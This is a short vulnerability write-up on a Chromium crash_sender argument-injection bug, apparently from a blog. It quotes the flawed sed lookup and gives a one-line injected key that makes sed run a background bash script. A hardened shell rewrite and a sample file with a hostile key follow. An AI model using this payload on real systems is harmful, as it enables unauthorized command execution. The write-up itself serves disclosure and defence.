Sunday, June 24, 2018

[05] Argument injection when launching a process

https://bugs.chromium.org/p/chromium/issues/detail?id=817993

When a process is launched with arguments that have not been handled properly, argument injection can occur.

get_key_value() {
  local file="$1" key="$2" value

  if [ -f "${file}" ]; then
    # Return the first entry.  There shouldn't be more than one anyways.
    # Substr at length($1) + 2 skips past the key and following = sign (awk
    # uses 1-based indexes), but preserves embedded = characters.
>>>    value=$(sed -n "/^${key}[[:space:]]*=/{s:^[^=]*=::p;q}" "${file}")
  fi

  echo "${value:-undefined}"
}

......

  # Grab any variable that begins with upload_.
  local v
>>>  for k in $(get_keys "${meta_path}" "^upload_"); do
>>>    v="$(get_key_value "${meta_path}" "${k}")"
    case ${k} in
      # Product & version are handled separately.
      upload_var_prod) ;;
      upload_var_ver) ;;
      upload_var_*)
        set -- "$@" -F "${upload_prefix}${k#upload_var_}=${v}"
        ;;
      upload_text_*)
        if [ -r "${v}" ]; then
          set -- "$@" -F "${upload_prefix}${k#upload_text_}=<${v}"
        fi
        ;;
      upload_file_*)
        if [ -r "${v}" ]; then
          set -- "$@" -F "${upload_prefix}${k#upload_file_}=@${v}"
        fi
        ;;
    esac
  done

Injection occurs when the input is

/p;s^.*^setsid${IFS}bash${IFS}<path-to-shell-script>${IFS}&^ep;/=1

because the sed -e argument is a script that gets executed.

-e script, --expression=script
add the script to the commands to be executed
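As an added example (not crash_sender's own code and not part of the original post), the POSIX shell below shows a hardened replacement for the two highlighted spots: the key is validated as a plain identifier before it is used anywhere, and the lookup is done with the shell's own read loop, so neither a key nor a value from the metadata file ever becomes part of a sed program. The function names, the sample metadata contents and the hostile key in them are constructed for this illustration.

```shell
#!/bin/sh
# Added example, not part of crash_sender or the original post: hardened
# lookup that never lets metadata text become part of an interpreter program.

# Return 0 if the key is a plain identifier, 1 otherwise.  Anything else
# (e.g. a name containing '/', ';' or '^') is rejected before it is used.
is_safe_key() {
  case "$1" in
    ''|*[!A-Za-z0-9_]*) return 1 ;;
    *) return 0 ;;
  esac
}

# Strip trailing spaces/tabs, mirroring the original's "key[[:space:]]*=".
rtrim_blanks() {
  local s="$1" tab
  tab=$(printf '\t')
  while :; do
    case "$s" in
      *" ") s=${s%" "} ;;
      *"$tab") s=${s%"$tab"} ;;
      *) break ;;
    esac
  done
  printf '%s' "$s"
}

# Hardened get_key_value: validate the key, then parse with `read` instead of
# interpolating it into a sed script.  Embedded '=' in values is preserved.
get_key_value_safe() {
  local file="$1" key="$2" value="" line lhs
  if ! is_safe_key "$key"; then
    echo undefined
    return 1
  fi
  if [ -f "$file" ]; then
    while IFS= read -r line || [ -n "$line" ]; do
      case "$line" in *=*) ;; *) continue ;; esac
      lhs=$(rtrim_blanks "${line%%=*}")
      if [ "$lhs" = "$key" ]; then
        value=${line#*=}   # first entry wins, as in the original
        break
      fi
    done < "$file"
  fi
  echo "${value:-undefined}"
}

# Hardened key enumeration for the upload_ loop: keys come from the (untrusted)
# metadata file, so any key that is not a plain identifier is dropped here.
safe_upload_keys() {
  local file="$1" line k
  [ -f "$file" ] || return 0
  while IFS= read -r line || [ -n "$line" ]; do
    case "$line" in upload_*=*) ;; *) continue ;; esac
    k=$(rtrim_blanks "${line%%=*}")
    is_safe_key "$k" && printf '%s\n' "$k"
  done < "$file"
  return 0
}

# Constructed sample metadata file (not a real crash report), including one
# key containing sed metacharacters that the hardened code must drop.
make_sample_meta() {
  local tmp
  tmp=$(mktemp)
  printf '%s\n' \
    'upload_var_prod=Chrome_ChromeOS' \
    'upload_var_ver =66.0' \
    'upload_var_channel=stable=beta' \
    'upload_var_x/p;q=ignored' \
    'done=1' > "$tmp"
  echo "$tmp"
}

# Stand-alone demo.
meta=$(make_sample_meta)
echo "channel: $(get_key_value_safe "$meta" upload_var_channel)"
echo "keys kept:"; safe_upload_keys "$meta"
rm -f "$meta"
```

The validation in is_safe_key is the essential fix: the loop in the original takes its key names from the metadata file itself, so a hostile key name is a hostile sed script unless the name is constrained to characters that cannot alter the program. The read-based parser then removes the interpreter from the path entirely, which also covers values that sed would otherwise interpret.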